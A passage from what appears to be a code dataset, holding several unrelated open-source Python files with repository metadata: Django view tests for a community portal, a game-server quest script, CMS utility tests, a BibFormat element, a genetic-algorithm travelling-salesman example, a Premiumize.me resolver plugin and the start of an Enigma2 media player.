url = reverse('view_community_news_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post_list.html')
self.assertContains(response, "Bar")
self.assertContains(response, "Hi there!")
def test_community_news_sidebar(self):
"""Test the presence or the lack of a news sidebar in the template"""
url = reverse('view_community_news_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "News Actions")
self.assertNotContains(response, "Add news")
self.client.login(username="foo", password="foobar")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/snippets/news_sidebar.html')
self.assertContains(response, "News Actions")
self.assertContains(response, "Add news")
self.assertNotContains(response, "Edit current news")
self.assertNotContains(response, "Delete current news")
User.objects.create_user(username="baz", password="foobar")
self.client.login(username="baz", password="foobar")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "News Actions")
self.assertNotContains(response, "Add news")
class CommunityNewsViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_community_news_view(self):
"""Test GET request to view a single community news"""
url = reverse('view_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post.html')
self.assertContains(response, "Bar")
self.assertContains(response, "Hi there!")
def test_community_news_sidebar(self):
"""Test the presence or the lack of the news sidebar in the template"""
self.client.login(username="foo", password="foobar")
News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/snippets/news_sidebar.html')
self.assertContains(response, "News Actions")
self.assertContains(response, "Add news")
self.assertContains(response, "Edit current news")
self.assertContains(response, "Delete current news")
class AddCommunityNewsViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_get_add_community_news(self):
"""Test GET create new community news"""
url = reverse('add_community_news', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'common/add_post.html')
new_user = User.objects.create_user(username="bar", password="foobar")
self.client.login(username='bar', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
group = Group.objects.get(name="Foo: Content Manager")
new_user.groups.add(group)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_post_add_community_news(self):
"""Test POST create new community news"""
url = reverse('add_community_news', kwargs={'slug': 'foo'})
response = self.client.post(url, data={})
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.post(url, data={"slug": "baz"})
self.assertEqual(response.status_code, 200)
data = {'slug': 'bar',
'title': 'Bar',
'content': "Rainbows and ponies"}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 302)
news = News.objects.get()
self.assertEqual(news.title, 'Bar')
self.assertEqual(news.author, self.systers_user)
class EditCommunityNewsViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.news = News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
self.client = Client()
def test_get_edit_community_news_view(self):
"""Test GET to edit community news"""
url = reverse('edit_community_news', kwargs={'slug': 'foo',
'news_slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
url = reverse('edit_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_post_edit_community_news_view(self):
"""Test POST to edit community news"""
url = reverse('edit_community_news', kwargs={'slug': 'foo',
'news_slug': 'foo'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
url = reverse('edit_community_news', kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
data = {'slug': 'another',
'title': 'Baz',
'content': "Rainbows and ponies"}
self.client.login(username='foo', password='foobar')
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 302)
class DeleteCommunityNewsViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
News.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
self.client = Client()
def test_get_delete_community_news_view(self):
"""Test GET to confirm deletion of news"""
url = reverse("delete_community_news", kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Confirm to delete")
def test_post_delete_community_news_view(self):
"""Test POST to delete a community news"""
url = reverse("delete_community_news", kwargs={'slug': 'foo',
'news_slug': 'bar'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.post(url)
self.assertEqual(response.status_code, 302)
self.assertSequenceEqual(News.objects.all(), [])
class CommunityResourceListViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_community_news_list_view_no_resources(self):
"""Test GET request to resources list with an invalid community slug
and with a valid community slug, but no resources"""
url = reverse('view_community_resource_list', kwargs={'slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
url = reverse('view_community_resource_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post_list.html')
def test_community_resource_list_view_with_resources(self):
"""Test GET request to resource list with a single existing community
resource."""
Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_resource_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post_list.html')
self.assertContains(response, "Bar")
self.assertContains(response, "Hi there!")
resource_type = ResourceType.objects.create(name="abc")
Resource.objects.create(slug="new", title="New",
author=self.systers_user,
content="New content!",
community=self.community,
resource_type=resource_type)
missing_param_url = url + "?type=cba"
response = self.client.get(missing_param_url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Types")
self.assertContains(response, "abc")
self.assertContains(response, "Bar")
self.assertContains(response, "New")
existing_param_url = url + "?type=abc"
response = self.client.get(existing_param_url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Types")
self.assertContains(response, "abc")
self.assertNotContains(response, "Bar")
self.assertContains(response, "New")
def test_community_resource_sidebar(self):
"""Test the presence or the lack of a resource sidebar in the
template"""
url = reverse('view_community_resource_list', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Resource Actions")
self.assertNotContains(response, "Add resource")
self.client.login(username="foo", password="foobar")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response,
'blog/snippets/resources_sidebar.html')
self.assertContains(response, "Resource Actions")
self.assertContains(response, "Add resource")
self.assertNotContains(response, "Edit current resource")
self.assertNotContains(response, "Delete current resource")
User.objects.create_user(username="baz", password="foobar")
self.client.login(username="baz", password="foobar")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Resource Actions")
self.assertNotContains(response, "Add resource")
class CommunityResourceViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_community_resource_view(self):
"""Test GET request to view a community resource"""
url = reverse('view_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'blog/post.html')
self.assertContains(response, "Bar")
self.assertContains(response, "Hi there!")
def test_community_resources_sidebar(self):
"""Test the presence or the lack of the resource sidebar in the
template"""
self.client.login(username="foo", password="foobar")
Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
url = reverse('view_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response,
'blog/snippets/resources_sidebar.html')
self.assertContains(response, "Resource Actions")
self.assertContains(response, "Add resource")
self.assertContains(response, "Edit current resource")
self.assertContains(response, "Delete current resource")
class AddCommunityResourceViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.client = Client()
def test_get_add_community_resource(self):
"""Test GET create new community resource"""
url = reverse('add_community_resource', kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'common/add_post.html')
new_user = User.objects.create_user(username="bar", password="foobar")
self.client.login(username='bar', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
group = Group.objects.get(name="Foo: Content Manager")
new_user.groups.add(group)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_post_add_community_resource(self):
"""Test POST create new community resource"""
url = reverse('add_community_resource', kwargs={'slug': 'foo'})
response = self.client.post(url, data={})
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.post(url, data={"slug": "baz"})
self.assertEqual(response.status_code, 200)
data = {'slug': 'bar',
'title': 'Bar',
'content': "Rainbows and ponies"}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 302)
resource = Resource.objects.get()
self.assertEqual(resource.title, 'Bar')
self.assertEqual(resource.author, self.systers_user)
class EditCommunityResourceViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
self.resource = Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
self.client = Client()
def test_get_edit_community_resource_view(self):
"""Test GET to edit community resource"""
url = reverse('edit_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
url = reverse('edit_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_post_edit_community_resource_view(self):
"""Test POST to edit community resource"""
url = reverse('edit_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'foo'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
url = reverse('edit_community_resource',
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
data = {'slug': 'another',
'title': 'Baz',
'content': "Rainbows and ponies"}
self.client.login(username='foo', password='foobar')
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 302)
class DeleteCommunityResourceViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
Resource.objects.create(slug="bar", title="Bar",
author=self.systers_user,
content="Hi there!",
community=self.community)
self.client = Client()
def test_get_delete_community_resource_view(self):
"""Test GET to confirm deletion of a resource"""
url = reverse("delete_community_resource",
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Confirm to delete")
def test_post_delete_community_resource_view(self):
"""Test POST to delete a community resource"""
url = reverse("delete_community_resource",
kwargs={'slug': 'foo', 'resource_slug': 'bar'})
response = self.client.post(url)
self.assertEqual(response.status_code, 403)
self.client.login(username='foo', password='foobar')
response = self.client.post(url)
self.assertEqual(response.status_code, 302)
self.assertSequenceEqual(Resource.objects.all(), [])
class AddTagViewTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='foo', password='foobar')
self.systers_user = SystersUser.objects.get()
self.community = Community.objects.create(name="Foo", slug="foo",
order=1,
admin=self.systers_user)
def test_add_tag_view(self):
"""Test GET and POST requests to add a new tag"""
url = reverse("add_tag", kwargs={'slug': 'foo'})
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
group = Group.objects.get(name="Foo: Content Contributor")
self.systers_user.join_group(group)
self.client.login(username='foo', password='foobar')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.client.post(url, data={'name': 'Baz'})
self.assertEqual(response.status_code, 200)
self.assertEqual(Tag.objects.get().name, "Baz")
|
willingc/portal
|
systers_portal/blog/tests/test_views.py
|
Python
|
gpl-2.0
| 25,309
|
#
# Created by DraX on 2005.08.12
# minor fixes by DrLecter 2005.09.10
print "importing village master data: Alliance ...done"
import sys
from net.sf.l2j.gameserver.model.quest import State
from net.sf.l2j.gameserver.model.quest import QuestState
from net.sf.l2j.gameserver.model.quest.jython import QuestJython as JQuest
NPC=[7026,7031,7037,7066,7070,7109,7115,7120,7154,7174,7175,7176,7187,7191,7195,7288,7289,7290,7297,7358,7373,7462,7474,7498,7499,7500,7503,7504,7505,7508,7511,7512,7513,7520,7525,7565,7594,7595,7676,7677,7681,7685,7687,7689,7694,7699,7704,7845,7847,7849,7854,7857,7862,7865,7894,7897,7900,7905,7910,7913,8269,8272,8276,8279,8285,8288,8314,8317,8321,8324,8326,8328,8331,8334,8755]
class Quest (JQuest) :
def onEvent (self,event,st):
ClanLeader = st.player.isClanLeader();
Clan = st.player.getClanId();
htmltext = event
if event == "9001-01.htm": htmltext = "9001-01.htm"
elif (Clan == 0):
st.exitQuest(1);
htmltext = "<html><body>You must be in Clan.</body></html";
elif event == "9001-02.htm": htmltext = "9001-02.htm"
return htmltext
def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)
def onTalk (Self,npc,st):
npcId = npc.getNpcId()
ClanLeader = st.player.isClanLeader();
Clan = st.player.getClan();
if npcId in NPC:
st.set("cond","0")
st.setState(STARTED)
return "9001-01.htm"
QUEST = Quest(9001,"9001_alliance","village_master")
CREATED = State('Start', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
for item in NPC:
### Quest NPC starter initialization
QUEST.addStartNpc(item)
### Quest NPC initialization
STARTED.addTalkId(item)
|
Barrog/C4-Datapack
|
data/jscript/village_master/9001_alliance/__init__.py
|
Python
|
gpl-2.0
| 1,758
|
# -*- coding: utf-8 -*-
from castle.cms.browser.utils import Utils
from castle.cms import utils
from castle.cms.testing import CASTLE_PLONE_INTEGRATION_TESTING
from plone import api
from plone.app.testing import login
from plone.app.testing import setRoles
from plone.app.testing import TEST_USER_ID
from plone.app.testing import TEST_USER_NAME
from OFS.CopySupport import _cb_encode
from ZODB.POSException import ConflictError
import unittest
class TestUtils(unittest.TestCase):
layer = CASTLE_PLONE_INTEGRATION_TESTING
def setUp(self):
self.portal = self.layer['portal']
self.request = self.layer['request']
self.utils = Utils(self.portal, self.request)
def test_main_links(self):
login(self.portal, TEST_USER_NAME)
setRoles(self.portal, TEST_USER_ID, ('Member', 'Manager'))
if 'front-page' not in self.portal:
api.content.create(type='Document', id='front-page',
container=self.portal)
self.portal.setDefaultPage('front-page')
data = self.utils.get_main_links()
self.assertEquals(data['selected_portal_tab'], 'index_html')
self.assertEquals(len(data['portal_tabs']), 1)
def test_truncate_text(self):
self.assertEqual(
len(utils.truncate_text('foo bar foo bar', 2).split(' ')),
2)
def test_truncate_text_with_html(self):
result = utils.truncate_text('foo <b>bar</b> <span>foo bar</span>', 2)
self.assertEqual('foo <b>bar…</b>', result)
def test_random_functions(self):
self.assertEqual(len(utils.get_random_string(15)), 15)
self.assertEqual(len(utils.make_random_key(15)), 15)
def test_get_paste_data(self):
login(self.portal, TEST_USER_NAME)
setRoles(self.portal, TEST_USER_ID, ('Member', 'Manager'))
newpage = api.content.create(type='Document', id='newpage',
container=self.portal)
api.content.transition(obj=newpage, to_state='published')
cp = (0, [
('', 'plone', 'newpage')
])
cp = _cb_encode(cp)
self.request['__cp'] = cp
data = utils.get_paste_data(self.request)
self.assertEqual(data['count'], 1)
self.assertEqual(data['op'], 0)
self.assertEqual(data['paths'], ['/plone/newpage'])
def test_recursive_create_path(self):
login(self.portal, TEST_USER_NAME)
setRoles(self.portal, TEST_USER_ID, ('Member', 'Manager'))
folder = utils.recursive_create_path(self.portal, '/foo/bar/blah')
self.assertEqual(
'/'.join(folder.getPhysicalPath()),
'/plone/foo/bar/blah'
)
def test_retriable(self):
count = []
@utils.retriable(reraise=False)
def dosomething():
count.append(1)
raise ConflictError()
dosomething()
self.assertEqual(len(count), 3)
|
castlecms/castle.cms
|
castle/cms/tests/test_utils.py
|
Python
|
gpl-2.0
| 2,964
|
# -*- coding: utf-8 -*-
##
## $Id: bfe_CERN_plots.py,v 1.3 2009/03/17 10:55:15 jerome Exp $
##
## This file is part of Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - Display image of the plot if we are in selected plots collection
"""
__revision__ = "$Id: bfe_CERN_plots.py,v 1.3 2009/03/17 10:55:15 jerome Exp $"
from invenio.bibdocfile import BibRecDocs
from invenio.urlutils import create_html_link
from invenio.config import CFG_SITE_URL
def format_element(bfo):
"""
Display image of the thumbnail plot if we are in selected plots collections
"""
## To achieve this, we take the Thumb file associated with this document
bibarchive = BibRecDocs(bfo.recID)
img_files = []
for doc in bibarchive.list_bibdocs():
for _file in doc.list_latest_files():
if _file.get_type() == "Plot":
caption_text = _file.get_description()[5:]
index = int(_file.get_description()[:5])
img_location = _file.get_url()
if img_location == "":
continue
img = '<img src="%s" width="100px"/>' % \
(img_location)
img_files.append((index, img_location)) # FIXME: was link here
if _file.get_type() == "Thumb":
img_location = _file.get_url()
img = '<img src="%s" width="100px"/>' % \
(img_location)
return '<div align="left">' + img + '</div>'
# then we use the default: the last plot with an image
img_files = sorted(img_files, key=lambda x: x[0])
if img_files:
return '<div align="left">' + img_files[-1][1] + '</div>'
else:
return ''
def escape_values(bfo):
"""
Called by BibFormat in order to check if output of this element
should be escaped.
"""
return 0
|
pombredanne/invenio
|
modules/bibformat/lib/elements/bfe_plots_thumb.py
|
Python
|
gpl-2.0
| 2,623
|
import math
import random
try:
import matplotlib.pyplot as plt
import matplotlib.animation as animation
plt.style.use('ggplot')
except ImportError:
plt = None
from ..algorithms import BaseGeneticAlgorithm
from ..chromosomes import ReorderingSetChromosome
from ..genes import BinaryGene
from ..translators import BinaryIntTranslator
class TravellingSalesmanGA(BaseGeneticAlgorithm):
def __init__(self, city_distances, *args, **kwargs):
"""
city_distances: 2-deep mapping of city_id -> city_id -> distance
"""
super().__init__(*args, **kwargs)
self.city_distances = city_distances
self.max_distance = max([max(subdict.values()) for subdict in city_distances.values()])
self.num_cities = len(self.city_distances)
def calc_distance(self, chromosome, pow=1):
# get list of city IDs
city_ids = self.translator.translate_chromosome(chromosome)
# compute distance travelled
tot_dist = 0
for i, start_city_id in enumerate(city_ids[:-1]):
end_city_id = city_ids[i + 1]
tot_dist += self.city_distances[start_city_id][end_city_id] ** pow
tot_dist += self.city_distances[city_ids[-1]][city_ids[0]] ** pow
return tot_dist
def eval_fitness(self, chromosome):
"""
Calculate the distance travelled by the salesman by converting
the solution/chromosome into a sequence of visited city IDs.
Penalty distance is added each time any of these conditions occur:
1. cities are visited multiple times
2. not all cities are visited
3. an invalid city ID is encountered
return: fitness value
"""
return -self.calc_distance(chromosome, pow=2)
def run(num_cities=20, num_chromosomes=20, generations=2500, plot=True):
# solve a simple travelling salesman problem
rs = random.randint(1, 1000000)
random.seed(100)
gene_length = -1
for i in range(1, num_cities + 1):
if 2 ** i >= num_cities:
gene_length = i + 1
break
assert gene_length >= 1
city_ids = list(range(1, num_cities + 1))
city_points = {city_id: (random.random() * 100, random.random() * 100) for city_id in city_ids}
city_distances = {}
for start_city_id in city_ids:
city_distances[start_city_id] = {}
x1, y1 = city_points[start_city_id]
for end_city_id in city_ids:
x2, y2 = city_points[end_city_id]
dist = math.sqrt((x2 - x1)**2 + (y2 - y1)**2)
city_distances[start_city_id][end_city_id] = dist
print("city distances:")
for start_city_id in city_ids:
for end_city_id in city_ids:
print("distance from", start_city_id, "to", end_city_id, "=", city_distances[start_city_id][end_city_id])
random.seed(rs)
chromosomes = []
for x in range(num_chromosomes):
genes = []
for city_id in city_ids:
dna = ('{:0' + str(gene_length) + 'd}').format(int(bin(city_id)[2:]))
g = BinaryGene(dna, name='city ' + str(x))
genes.append(g)
choices = [g.dna for g in genes]
c = ReorderingSetChromosome(genes, choices)
chromosomes.append(c)
ts_ga = TravellingSalesmanGA(city_distances, chromosomes,
translator=BinaryIntTranslator(),
abs_fit_weight=0, rel_fit_weight=1)
p_mutate = 0.10
p_cross = 0.50
best = ts_ga.run(generations, p_mutate, p_cross, elitist=True, refresh_after=generations/2)
best_city_ids = ts_ga.translator.translate_chromosome(best)
best_dist = ts_ga.calc_distance(best)
print("run took", ts_ga.run_time_s, "seconds")
print("best solution =", best_city_ids)
print("best distance =", best_dist)
if plot:
if plt:
# plot fitness progression
plt.plot([v for k, v in sorted(ts_ga.overall_fittest_fit.items())], label='run best')
plt.plot([v for k, v in sorted(ts_ga.generation_fittest_fit.items())], label='gen best')
plt.legend(loc='best')
plt.show()
fig, ax = plt.subplots()
def iter_generations():
for gen in ts_ga.new_fittest_generations:
yield gen
def animate(generation):
chromosome = ts_ga.generation_fittest[generation]
ax.clear()
x, y = [], []
for city_id, point in city_points.items():
x.append(point[0])
y.append(point[1])
ax.plot(x, y, marker='s', linestyle='', label='cities', alpha=0.6)
# plot optimal route
chrom_city_ids = ts_ga.translator.translate_chromosome(chromosome)
dist = round(ts_ga.calc_distance(chromosome), 2)
ax.set_title("generation " + str(generation) + "\ndistance = " + str(dist))
for i, start_city_id in enumerate(chrom_city_ids):
end_city_idx = i + 1
if end_city_idx == num_cities:
# distance from last city to first
end_city_idx = 0
end_city_id = chrom_city_ids[end_city_idx]
x1, y1 = city_points[start_city_id]
x2, y2 = city_points[end_city_id]
mid_x = (x2 - x1) / 2 + x1
mid_y = (y2 - y1) / 2 + y1
plt.arrow(x1, y1, x2 - x1, y2 - y1, head_width=1.5, fc='k', ec='k', alpha=0.7, linestyle='dotted', length_includes_head=True)
plt.text(mid_x, mid_y, str(i + 1))
ani = animation.FuncAnimation(fig, animate, iter_generations,
repeat=True, interval=1000, repeat_delay=12000)
plt.show()
else:
print("Did not plot example results because matplotlib not installed")
|
mdscruggs/ga
|
ga/examples/travelling_salesman.py
|
Python
|
gpl-2.0
| 6,091
|
"""
urlresolver XBMC Addon
Copyright (C) 2013 Bstrdsmkr
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import SiteAuth
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
from urlresolver import common
from t0mm0.common.net import Net
import re
import urllib
try:
import simplejson as json
except ImportError:
import json
class PremiumizeMeResolver(Plugin, UrlResolver, SiteAuth, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "Premiumize.me"
domains = ["*"]
media_url = None
def __init__(self):
p = self.get_setting('priority') or 100
self.hosts = []
self.patterns = []
self.priority = int(p)
self.net = Net()
self.scheme = 'https' if self.get_setting('use_https') == 'true' else 'http'
def get_media_url(self, host, media_id):
username = self.get_setting('username')
password = self.get_setting('password')
url = '%s://api.premiumize.me/pm-api/v1.php?' % (self.scheme)
query = urllib.urlencode({'method': 'directdownloadlink', 'params[login]': username, 'params[pass]': password, 'params[link]': media_id})
url = url + query
response = self.net.http_GET(url).content
response = json.loads(response)
if 'status' in response:
if response['status'] == 200:
link = response['result']['location']
else:
raise UrlResolver.ResolverError('Link Not Found: Error Code: %s' % response['status'])
else:
raise UrlResolver.ResolverError('Unexpected Response Received')
common.addon.log_debug('Premiumize.me: Resolved to %s' % link)
return link
def get_url(self, host, media_id):
return media_id
def get_host_and_id(self, url):
return 'premiumize.me', url
def get_all_hosters(self):
try:
if not self.patterns or not self.hosts:
username = self.get_setting('username')
password = self.get_setting('password')
url = '%s://api.premiumize.me/pm-api/v1.php?' % (self.scheme)
query = urllib.urlencode({'method': 'hosterlist', 'params[login]': username, 'params[pass]': password})
url = url + query
response = self.net.http_GET(url).content
response = json.loads(response)
result = response['result']
log_msg = 'Premiumize.me patterns: %s hosts: %s' % (result['regexlist'], result['tldlist'])
common.addon.log_debug(log_msg)
self.hosts = result['tldlist']
self.patterns = [re.compile(regex) for regex in result['regexlist']]
except Exception as e:
common.addon.log_error('Error getting Premiumize hosts: %s' % (e))
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
if self.get_setting('login') == 'false': return False
self.get_all_hosters()
if url:
if not url.endswith('/'): url += '/'
for pattern in self.patterns:
if pattern.findall(url):
return True
elif host:
if host.startswith('www.'): host = host.replace('www.', '')
if any(host in item for item in self.hosts):
return True
return False
def get_settings_xml(self):
xml = PluginSettings.get_settings_xml(self)
xml += '<setting id="%s_use_https" type="bool" label="Use HTTPS" default="false"/>\n' % (self.__class__.__name__)
xml += '<setting id="%s_login" type="bool" label="login" default="false"/>\n' % (self.__class__.__name__)
xml += '<setting id="%s_username" enable="eq(-1,true)" type="text" label="Customer ID" default=""/>\n' % (self.__class__.__name__)
xml += '<setting id="%s_password" enable="eq(-2,true)" type="text" label="PIN" option="hidden" default=""/>\n' % (self.__class__.__name__)
return xml
def isUniversal(self):
return True
|
noba3/KoTos
|
addons/script.module.urlresolver/lib/urlresolver/plugins/premiumize_me.py
|
Python
|
gpl-2.0
| 4,829
|
import os
import time
from enigma import iPlayableService, eTimer, eServiceCenter, iServiceInformation, ePicLoad
from ServiceReference import ServiceReference
from Screens.Screen import Screen
from Screens.HelpMenu import HelpableScreen
from Screens.MessageBox import MessageBox
from Screens.InputBox import InputBox
from Screens.ChoiceBox import ChoiceBox
from Screens.InfoBar import InfoBar
from Screens.InfoBarGenerics import InfoBarSeek, InfoBarScreenSaver, InfoBarAudioSelection, InfoBarCueSheetSupport, InfoBarNotifications, InfoBarSubtitleSupport
from Components.ActionMap import NumberActionMap, HelpableActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap, MultiPixmap
from Components.FileList import FileList
from Components.MediaPlayer import PlayList
from Components.MovieList import AUDIO_EXTENSIONS
from Components.ServicePosition import ServicePositionGauge
from Components.ServiceEventTracker import ServiceEventTracker, InfoBarBase
from Components.Playlist import PlaylistIOInternal, PlaylistIOM3U, PlaylistIOPLS
from Components.AVSwitch import AVSwitch
from Components.config import config
from Components.SystemInfo import SystemInfo
from Tools.Directories import fileExists, resolveFilename, SCOPE_CONFIG, SCOPE_PLAYLIST, SCOPE_CURRENT_SKIN
from Tools.BoundFunction import boundFunction
from settings import MediaPlayerSettings
import random
class MyPlayList(PlayList):
def __init__(self):
PlayList.__init__(self)
def PlayListShuffle(self):
random.shuffle(self.list)
self.l.setList(self.list)
self.currPlaying = -1
self.oldCurrPlaying = -1
class MediaPixmap(Pixmap):
def __init__(self):
Pixmap.__init__(self)
self.coverArtFileName = ""
self.picload = ePicLoad()
